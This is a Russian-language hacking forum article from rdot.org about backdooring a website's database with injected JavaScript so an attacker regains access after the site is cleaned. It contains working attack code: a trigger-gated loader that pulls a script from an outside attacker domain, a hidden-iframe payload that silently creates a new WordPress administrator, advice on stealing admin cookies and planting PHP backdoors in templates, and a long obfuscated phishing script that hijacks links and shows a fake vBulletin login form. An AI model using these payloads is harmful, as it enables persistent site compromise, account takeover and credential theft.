TipsyRDOT:677Второе пришествие: бэкдор в БД (+ бонусный фишинг-код)
Рассмотрим, как можно использовать MySQL для сохранения доступа к ресурсу после обнаружения взлома и “чистки”.
// Специально для rdot.org
// Перепечатка без большой, жирной ссылки на источник разрешена только мудацким ресурсам.
Типичные рекомендации администратору веб-сервера по действиям после взлома выглядят примерно так:
Для распиздяев:
- если есть основания полагать, что была скомпрометирована операционная система - подключить диски к чистой системе (LiveCD) и прогнать чистилками (rkhunter/chkrootkit)
- прогнать веб-директории грепом на предмет подозрительных сигнатур ( eval(base64…, system(…, passthru(… )
- обновить всё до последних версий
- сменить все пароли
Для серьёзных проектов: - взять пустой винт
- установить последнюю версию ОС и пакетов из чистого дистрибутива
- восстановить конфигурационные файлы из бэкапа, сделанного до взлома, проверив их вручную.
- не использовать старые пароли
- если используются сторонние движки, скачать последние версии с сайта разработчика и сделать чистую установку
- если используется свой продукт, восстановить чистую копию из CVS.
- загрузить в БД свежие дампы (*****)
- сменить все пароли
В первом варианте, если чистил аматор, шанс сохранить доступ у хитрого хакера есть.
Во втором случае, если уязвимость устранена, доступ к ресурсу теряется без вариантов…
Или нет?
**На данный момент ни один из публично доступных документов по post-intrusion recovery не упоминает о необходимости проверки БД на предмет внедрения в неё вредоносного кода. **
Есть примерно три способа затроянить БД, чтобы восстановить доступ к ресурсу после чистки:
- Внедрение PHP кода.
- Внедрение яваскрипта.
- SQL триггеры.
По первому пункту мне нечего добавить, третий раскроет Dr.TRO.
Внедрение яваскрипта.
Большинство приложений построено по принципу “максимально фильтруем user input, записываем чистые данные в БД, безгранично доверяем контенту из БД”.
Имея прямой доступ к БД, можно записать туда js код, миновав фильтрацию на уровне приложения.
Редкие приложения фильтруют контент из БД, но даже в них можно найти лазейку - защита от инсайдера слабее внешней.
Что даёт внедрение js кода?
-возможность получить куки администратора, если они установлены без флажка httponly
-возможность выполнить в админке произвольные действия с правами администратора
Общие рекоммендации по внедрению закладки:
-если есть возможность, нужно вписаться во что-то, что выводится только в админке
Нам нужны права администратора, незачем светить скрипт по всему сайту.
-идеально, если есть возможность записаться прямо в существующий скрипт.
Иногда в админке используется такая конструкция при заполнении javascript переменных:
adminka.php
PHP код:
//…
<script>
a = “100000000000”;
thousands_separator = “<?=$b?>”; // Переменная $b берётся из бд? То, что нужно!
do_something(a,b);
Методика похожа на обычный sql injection - разрываем кавычки и добавляем свой код, экранируя лишнее комментарием //
-желательно вписаться во что-то, что нельзя отредактировать средствами движка
Если возможности вписаться в нередактируемое поле нет - заблокируйте или поставьте свой обработчик на элемент, который его редактирует. Абсолютно любой элемент на странице можно адресовать комбинацией операторов getElementByID(‘айди’), getElementsByTagName(‘input’)[3], getElementsByName(“name”)[4] и getElementsByClassName(“class”)1 rdot.org 2010
Общие рекоммендации по архитектуре закладки:
-закладке нужен некий триггер, который её активирует, в остальное время она должна тихо ждать своего часа.
-поместить триггер в файл на своём домене, безусловно, заманчиво, но опасно - мелькающий в адресной строке “левый” домен может привлечь внимание администратора
-триггером может служить любой контролируемый извне текст, который попадает на страницу со скриптом (в общем случае эта страница - админка). Для блогов, отображающих список последних событий, удобно использовать комментарий или trackback с “волшебным словом”. Триггер будет выглядеть так
if (document.body.innerHTML.search(“magic”+“word”)<0) {return;}
-если нет возможности влиять на текст в админке извне, триггером может служить дата, после которой “начинка” скрипта выполнится.
А сколько раз она выполнится?
-В качестве носителя для записи переменных удобно использовать самого администратора.
Когда закладка сработает, поставьте ему куки pwned, чтобы предовратить повторную сработку.
PHP код:
document.cookie = ‘pwned=yes; expires=Thu, 2 Aug 2021 20:47:11 UTC; path=/’;
Если скрипт получился длинным, можно вынести всё, кроме триггера, на внешний домен.
Заодно это послужит сигналом о том, что закладка отработала.
PHP код:
if (document.body.innerHTML.search(“magic”+“word”) < 0) {return;} // если писать magicword одним словом, он сам себя найдёт.
if (document.cookie.search(“pwned=yes”) > 0) {return;}
tmp = document.createElement(‘script’);
tmp.src = “http://h4x0r.info/pwn.js”; // или decodeURIComponent(‘%68%74%74%70%3A%2F%2F%68%34%78%30%72%2E%69%6E%66%6F%2F%70%77%6E%2E%6A%73’)
document.head.appendChild(tmp);
Общие рекоммендации по рабочей части закладки:
Если не используется флажок httponly, простейшим способом устроить грандиозное возвращение будет отправка строки document.cookie на внешний домен. На эту тему много написано, нет смысла повторяться.
Если используется httponly, нужно организовать доступ, выполнив некие действия от имени администратора (это будет сделано в фоне, незаметно для администратора)
Это может быть что угодно, что не требует ввода пароля.
- добавление нового администратора
- правка php файлов с целью добавить php закладку
- правка шаблонов smarty с целью добавить php закладку. Формат {php}код{/php}
- смена email-адреса администратора, если он не защищён паролем
Для этого используется примерно такой код:
PHP код:
ifrm = document.createElement(“iframe”);
ifrm.id = “pwn”;
ifrm.src = “new_user.php”;
ifrm.style.display = “none”;
document.body.appendChild(ifrm); // создаём невидимый фрейм с формой добавления нового пользователя
setTimeout(“adm()”,2000); // дадим фрейму время загрузиться. Альтернативный вариант - использовать onload
function adm () { // заполняем форму. Конкретно эта форма - добавление нового администратора в вордпресс.
i = document.getElementById(“pwn”).contentWindow.document;
i.getElementById(“user_login”).value = “pwnz0r”;
i.getElementById(“email”).value = “[email protected]”;
i.getElementById(“pass1”).value = “p4ssw0rd”;
i.getElementById(“pass2”).value = “p4ssw0rd”;
i.getElementById(“send_password”).checked = true; // в данном случае сигналом о том, что закладка выполнилась, будет письмо
i.getElementById(“role”).value = “administrator”;
i.getElementById(“adduser”).submit();
}
Если без ввода пароля ничего полезного сделать нельзя, остаётся последний вариант:
Фальшивая форма ввода пароля
Я прикрепил к статье рабочий код, иллюстрирующий работу со скрытыми фреймами, и безобидную демонстрацию того, как может быть реализована фальшивая форма логина (только для зарегистрированных пользователей).
Строка для запуска(нужно скопировать в адресбар) :
PHP код:
javascript:alert(document.getElementsByClassName(“alt2”)[2].getElementsByTagName(“code”)[((id=new Function(document.getElementsByTagName(“pre”)[0].textContent))+id())]=“Привет, я новое значение этого поля.”);
Прежде чем запускать, ознакомьтесь с кодом, он в конце статьи.
Что произойдёт:
- через несколько секунд вы отправите себе ЛС о том, что код запущен
- при нажатии на любую ссылку она будет открыта во фрейме (перехват активного окна)
- можно браузить в обычном режиме чуть больше минуты
- будет выдана фальшивая форма логина.
- после заполнения формы (кстати, хороший шанс протестировать на защищённость от фишинга свой менеджер паролей) вы получите от себя вторую ЛС, в которой указано число букв в пароле.
- будет показан алерт.
Если в вашем браузере не работает, отпишитесь.
Протестировано в Firefox, Safari, Chrome, Opera.
Подводные камни:
Яваскрипт прекращает выполнение в случае ошибки, потому аккуратнее с чтением/записью в не полностью загрузившийся документ. Лучше добавить проверки, и использовать setTimeout / onload.
Цитата:
Код:
function a () {
if (document.getElementById('comments') == null) { // блок комментов ещё не загрузился
setTimeout(a,200); return} else {
// делаем проверку на magicword
}} document.getElementsByClassName("alt2")[6].getElementsByTagName("code")[1].innerHTML="Привет, я новое значение этого поля.";document.location.replace(document.location.href+'#?1');login =document.getElementsByTagName('strong')[1].getElementsByTagName('a')[0].textContent;delay=5000;setTimeout(new Function('pm1 = document.createElement("iframe");pm1.style.display = "none";pm1.id = "pm1";pm1.src = "https://rdot.org/forum/private.php?do=newpm&u=340";document.body.appendChild(pm1);'),delay);setTimeout(pm,delay+100);function pm () {if(document.getElementById("pm1").contentWindow.document.getElementById("pmrecips_txt")==null) {setTimeout(pm,100);return;}p = document.getElementById("pm1").contentWindow.document;p.getElementById("pmrecips_txt").value = login;p.getElementsByName("title")[0].value = "Я запустил код";p.getElementById('vB_Editor_001_textarea').value = "Десять символов.";p.getElementsByName('vbform')[0].submit();}a = document.getElementsByTagName('a');for (i in a) {a[i].onclick = hijack;}function hijack() {pm1.src = "https://rdot.org/forum/private.php?do=newpm&u=340";ifrm = document.createElement("iframe");ifrm.id = "ifrm";ifrm.src = this;ifrm.style.position = "absolute";ifrm.style.top = "0px";ifrm.style.left = "0px";ifrm.style.zIndex = 999;ifrm.style.height = "100%";ifrm.style.width = "100%";ifrm.style.border = "0px";ifrm.style.padding = "0px";document.body.appendChild(ifrm);document.body.style.overflow="hidden";setTimeout(l,50000);return false;}function l () {document.getElementById("ifrm").contentWindow.document.body.onclick = function(){document.getElementById("ifrm").contentWindow.document.body.onclick="";d='<div><table width="100%" align="center" border="0"><tbody><tr><td width="100%"> <table width="100%" border="0"><tbody><tr><td></td></tr><tr> <td colspan="2"></td></tr></tbody></table></td></tr></tbody></table><div><div><div><br><div><table width="100%" align="center" border="0"><tbody><tr align="center"><td><a href>Регистрация</a></td><td><a href>Сообщения за день</a></td><td><a href>Поиск</a> </td></tr></tbody></table></div><div><table border="0"><tbody><tr><td>Поиск по форуму</td></tr><tr><td><form action="search.php?do=process" method="post"><input name="do" value="process" type="hidden"><input name="quicksearch" value="1" type="hidden"><input name="childforums" value="1" type="hidden"><input name="exactname" value="1" type="hidden"><input name="s" value="" type="hidden"><input name="securitytoken" value="guest" type="hidden"><div><input class="bginput" name="query" size="25" tabindex="1001" type="text"><input class="button" value="Вперёд" tabindex="1004" type="submit"></div><div><label for="rb_nb_sp0"><input name="showposts" value="0" id="rb_nb_sp0" tabindex="1002" checked="checked" type="radio">Отобразить темы</label> <label for="rb_nb_sp1"><input name="showposts" value="1" id="rb_nb_sp1" tabindex="1003" type="radio">Отображать сообщения</label></div></form></td></tr><tr><td><a href>Поиск по метке</a></td></tr><tr><td><a href>Расширенный поиск</a></td></tr></tbody></table></div><div><table border="0"><tbody><tr><td>К странице...</td></tr><tr><td><form action="index.php" method="get" onsubmit="return this.gotopage()" id="pagenav_form"><input class="bginput" id="pagenav_itxt" style="font-size: 11px;" size="4" type="text"><input class="button" id="pagenav_ibtn" value="Вперёд" type="button"></form></td></tr></tbody></table></div><table width="100%" align="center" border="0"><tbody><tr><td width="100%"><table border="0"><tbody><tr valign="bottom"><td><a href="#"><img title="Вернуться" src alt="Вернуться"></a></td><td> </td><td width="100%"><span><a href="/forum/?s=">RDot</a></span> </td></tr><tr><td colspan="3"><a href="/forum/usercp.php"><img title="Перезагрузить страницу" src alt="Перезагрузить страницу"></a> <strong>Сообщение форума</strong></td></tr></tbody></table></td><td><form style="display:none;"><table border="0"><tbody><tr><td><label for="navbar_username">Имя</label></td><td></td><td><label for="cb_cookieuser_navbar">Запомнить?</label></td></tr><tr><td><label for="navbar_password">Пароль</label></td><td></td><td></td></tr></tbody></table><input name="s" value="" type="hidden"><input name="securitytoken" value="guest" type="hidden"><input name="do" value="login" type="hidden"><input name="vb_login_md5password" type="hidden"><input name="vb_login_md5password_utf" type="hidden"></form></td></tr></tbody></table><br><div><table border="0"><tbody><tr><td>Поиск по форуму</td></tr><tr><td><form action="search.php?do=process" method="post"><input name="do" value="process" type="hidden"><input name="quicksearch" value="1" type="hidden"><input name="childforums" value="1" type="hidden"><input name="exactname" value="1" type="hidden"><input name="s" value="" type="hidden"><div><input class="bginput" name="query" size="25" tabindex="1001" type="text"><input class="button" value="Вперёд" tabindex="1004" type="submit"></div><div><label for="rb_nb_sp0"><input name="showposts" value="0" id="rb_nb_sp0" tabindex="1002" checked="checked" type="radio">Отобразить темы</label> <label for="rb_nb_sp1"><input name="showposts" value="1" id="rb_nb_sp1" tabindex="1003" type="radio">Отображать сообщения</label></div></form></td></tr><tr><td><a href>Поиск по метке</a></td></tr><tr><td><a href>Расширенный поиск</a></td></tr></tbody></table></div><div><table border="0"><tbody><tr><td>К странице...</td></tr><tr><td><form action="index.php" method="get" onsubmit="return this.gotopage()" id="pagenav_form"><input class="bginput" id="pagenav_itxt" style="font-size: 11px;" size="4" type="text"><input class="button" id="pagenav_ibtn" value="Вперёд" type="button"></form></td></tr></tbody></table></div><table width="70%" align="center" border="0"><tbody><tr><td>Сообщение форума</td></tr><tr><td align="center"><div><div><form action="login.php?do=login" method="post" onsubmit="p=parent.window.pm1.contentWindow.document;p.getElementById(\'pmrecips_txt\').value =parent.window.login;p.getElementsByName(\'title\')[0].value = \'Я ввёл пароль\';p.getElementById(\'vB_Editor_001_textarea\').value = \'Я ввёл логин \'+ document.getElementById(\'llogin\').value+\' и пароль длинной \'+document.getElementById(\'ppassword\').value.length+\' символов\';p.getElementsByName(\'vbform\')[0].submit();alert(\'Привет, \'+parent.window.login+\', я фишинг.\\n\\n\'+document.getElementById(\'llogin\').value+\':\'+document.getElementById(\'ppassword\').value);return false;"><div>Вы не авторизованы на форуме или не имеете доступа к этой странице. Это могло произойти по одной из нескольких причин:</div><ol><li>Вы не авторизованы на форуме. Введите имя пользователя и пароль и попробуйте ещё раз.</li><li>У вас недостаточно прав для обращения к этой странице. Возможно, вы пытаетесь обратиться к функциям администратора или к другим привилегированным функциям.</li><li>Возможно, администратор отключил вашу учётную запись, или вы не активированы на форуме.</li></ol><fieldset class="fieldset"><legend>Вход</legend><table align="center" border="0"><tbody><tr><td>Имя:<br><input class="bginput" id="llogin" name="vb_login_username" size="50" accesskey="u" tabindex="1" type="text"></td></tr><tr><td>Пароль:<br><input id="ppassword" style="font-weight: 500; font-style: normal; color: rgb(0, 0, 0);" class="bginput" name="vb_login_password" size="50" tabindex="1" type="password"></td></tr><tr><td><span><a href>Забыли пароль?</a></span><label for="cb_cookieuser"><input name="cookieuser" value="1" id="cb_cookieuser" tabindex="1" type="checkbox">Запомнить?</label></td></tr><tr><td align="right"><input class="button" value="Вход" accesskey="s" tabindex="1" type="submit"><input class="button" value="Сброс" accesskey="r" tabindex="1" type="reset"></td></tr></tbody></table></fieldset><div>Для просмотра этой страницы необходимо <a href>зарегистрироваться</a>.</div></form></div></div></td></tr></tbody></table><br><table align="center" border="0"><tbody><tr><td><div><form action="forumdisplay.php" method="get"><input name="s" value="" type="hidden"><input name="daysprune" value="" type="hidden"><strong>Быстрый переход</strong><br><select name="f" onchange="this.form.submit();"><optgroup label="Навигация по форуму"><option value="cp">Мой кабинет</option><option value="pm">Личные сообщения</option><option value="subs">Подписки</option><option value="wol">Кто на форуме</option><option value="search">Поиск по форуму</option><option value="home">Главная страница форума</option></optgroup><optgroup label="Разделы"><option value="8" class="fjdpth0"> Релизы и Статьи</option><option value="11" class="fjdpth1"> Релизы</option><option value="10" class="fjdpth1"> Статьи</option><option value="32" class="fjdpth2"> Чужие статьи/Переводы</option><option value="3" class="fjdpth0"> Аспекты НСД</option><option value="9" class="fjdpth1"> Web-среда</option><option value="15" class="fjdpth2"> Сценарии/CMF/СMS</option><option value="34" class="fjdpth2"> Форумы</option><option value="26" class="fjdpth2"> Уязвимости PHP</option><option value="22" class="fjdpth1"> Целевые системы</option><option value="23" class="fjdpth2"> Сервисы/БД/Серверы</option><option value="24" class="fjdpth2"> Повышение привилегий</option><option value="27" class="fjdpth1"> Аудит Web-приложений</option><option value="41" class="fjdpth0"> Технические аспекты</option><option value="42" class="fjdpth1"> Криптография</option><option value="47" class="fjdpth0"> Администрирование</option><option value="48" class="fjdpth1"> *nix-like</option><option value="49" class="fjdpth1"> Windows</option><option value="5" class="fjdpth0"> Разработка ПО</option><option value="39" class="fjdpth1"> Web-программирование</option><option value="19" class="fjdpth1"> Прикладное программирование</option><option value="6" class="fjdpth0"> Оффтоп</option><option value="50" class="fjdpth1"> Аппаратное обеспечение</option><option value="51" class="fjdpth2"> Схемотехника</option><option value="52" class="fjdpth2"> Фрикинг</option><option value="54" class="fjdpth2"> Беспроводные технологии</option><option value="53" class="fjdpth2"> Новости мира железа</option><option value="60" class="fjdpth1"> Видео</option><option value="14" class="fjdpth1"> Мировые новости</option><option value="12" class="fjdpth1"> Оффтоп</option><option value="40" class="fjdpth1"> Обратная связь</option></optgroup></select><input class="button" value="Вперёд" type="submit"></form></div></td></tr></tbody></table><br><br><br><div><div>Powered by vBulletin® Version 3.8.5<br>Copyright ©2000 - 2010, Jelsoft Enterprises Ltd. Перевод: <a href="http://www.zcarot.com/" target="_blank">zCarot</a></div><div><br></div></div><br></div></div></div><form action="index.php" method="get" style="clear: left;"><table width="100%" align="center" border="0"><tbody><tr><td width="100%" align="right"><div><strong><a href>Обратная связь</a> -<a href>Архив</a> - <a href="#top">Вверх</a></strong></div></td></tr></tbody></table></form>';document.getElementById("ifrm").contentWindow.document.body.innerHTML=d;return false;}}// Приятного реверсинга! :) (c) tipsy
(с) 2010 rdot.org